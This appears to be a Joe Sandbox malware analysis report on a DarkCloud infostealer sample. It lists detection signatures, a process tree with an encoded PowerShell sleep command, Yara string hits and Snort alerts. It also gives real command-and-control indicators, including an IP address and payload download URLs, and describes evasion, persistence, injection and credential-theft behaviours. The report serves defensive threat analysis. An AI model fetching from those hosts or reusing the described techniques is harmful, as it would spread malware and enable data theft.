Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BPL_1000572_007.bat.exe

Overview

General Information

Sample Name:BPL_1000572_007.bat.exe
Analysis ID:708242
MD5:4ff4a281a08a0681597794a3024fb584
SHA1:d3a70362b238b82db1ef1aefef920afedf717880
SHA256:a6db7e8c70adc90b74c0f08503f49cf041d79afed3b916676892725ce2dbcce0
Tags:exe
Infos:

Detection

DarkCloud
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Generic Dropper
Yara detected DarkCloud
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates multiple autostart registry keys
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • BPL_1000572_007.bat.exe (PID: 5820 cmdline: "C:\Users\user\Desktop\BPL_1000572_007.bat.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
    • powershell.exe (PID: 5248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Wthdlxoyqvnqsfcfiinf.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe" MD5: 386FB639720C77FC29E68682D264423F)
      • WerFault.exe (PID: 5744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • BPL_1000572_007.bat.exe (PID: 1952 cmdline: C:\Users\user\Desktop\BPL_1000572_007.bat.exe MD5: 4FF4A281A08A0681597794A3024FB584)
  • pdf.exe (PID: 3712 cmdline: "C:\Users\user\AppData\Roaming\note\pdf.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
  • pdf.exe (PID: 3536 cmdline: "C:\Users\user\AppData\Roaming\note\pdf.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
  • fireless.exe (PID: 1420 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
              0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpackMALWARE_Win_A310LoggerDetects A310LoggerditekSHen
              • 0x7b98:$s1: Temporary Directory * for
              • 0x7bd4:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
              • 0xe1d8:$s4: ExecQuery
              • 0x7b70:$s7: CopyHere
              • 0x7b2c:$s9: Shell.Application
              • 0x8224:$s9: shell.application
              • 0x69c8:$s12: @TITLE Removing
              • 0x7c68:$s13: @RD /S /Q "
              • 0xda9c:$v1_2: AddAttachment
              0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpackMALWARE_Win_A310LoggerDetects A310LoggerditekSHen
                • 0x7b98:$s1: Temporary Directory * for
                • 0x2fbb8:$s1: Temporary Directory * for
                • 0x7bd4:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
                • 0x2fbf4:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
                • 0xe1d8:$s4: ExecQuery
                • 0x361f8:$s4: ExecQuery
                • 0x7b70:$s7: CopyHere
                • 0x2fb90:$s7: CopyHere
                • 0x7b2c:$s9: Shell.Application
                • 0x8224:$s9: shell.application
                • 0x2fb4c:$s9: Shell.Application
                • 0x30244:$s9: shell.application
                • 0x69c8:$s12: @TITLE Removing
                • 0x2e9e8:$s12: @TITLE Removing
                • 0x7c68:$s13: @RD /S /Q "
                • 0x2fc88:$s13: @RD /S /Q "
                • 0xda9c:$v1_2: AddAttachment
                • 0x35abc:$v1_2: AddAttachment
                0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                  Click to see the 17 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.6185.252.178.6349707802034631 09/23/22-07:59:51.380310
                  SID:2034631
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.6185.252.178.6349712802034631 09/23/22-08:01:54.005892
                  SID:2034631
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.6185.252.178.6349715802034631 09/23/22-08:02:01.550542
                  SID:2034631
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.6185.252.178.6349710802034631 09/23/22-08:01:29.985260
                  SID:2034631
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.6185.252.178.6349711802034631 09/23/22-08:01:37.884830
                  SID:2034631
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeReversingLabs: Detection: 61%
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeReversingLabs: Detection: 32%
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeReversingLabs: Detection: 32%
                  Machine Learning detection for sample
                  Source: BPL_1000572_007.bat.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeJoe Sandbox ML: detected
                  Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpackAvira: Label: TR/Patched.Ren.Gen
                  Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpackAvira: Label: TR/Patched.Ren.Gen
                  Source: BPL_1000572_007.bat.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: BPL_1000572_007.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: .pdb= source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Core.pdb\ source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.pdbj source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Xml.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Core.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: mscorlib.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Core.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.pdb4: source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.ni.pdb source: WER8A92.tmp.dmp.21.dr

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49707 -> 185.252.178.63:80
                  Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49710 -> 185.252.178.63:80
                  Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49711 -> 185.252.178.63:80
                  Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49712 -> 185.252.178.63:80
                  Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49715 -> 185.252.178.63:80
                  May check the online IP address of the machine
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeDNS query: name: showip.net
                  Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 185.252.178.63 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.252.178.63
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.252.178.63
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590699923.0000000003291000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png
                  Source: BPL_1000572_007.bat.exe, pdf.exe.0.dr, fireless.exe.13.drString found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/
                  Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp
                  Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.430950598.00000000006D2000.00000002.00000001.01000000.00000007.sdmp, Wthdlxoyqvnqsfcfiinf.exe.0.drString found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
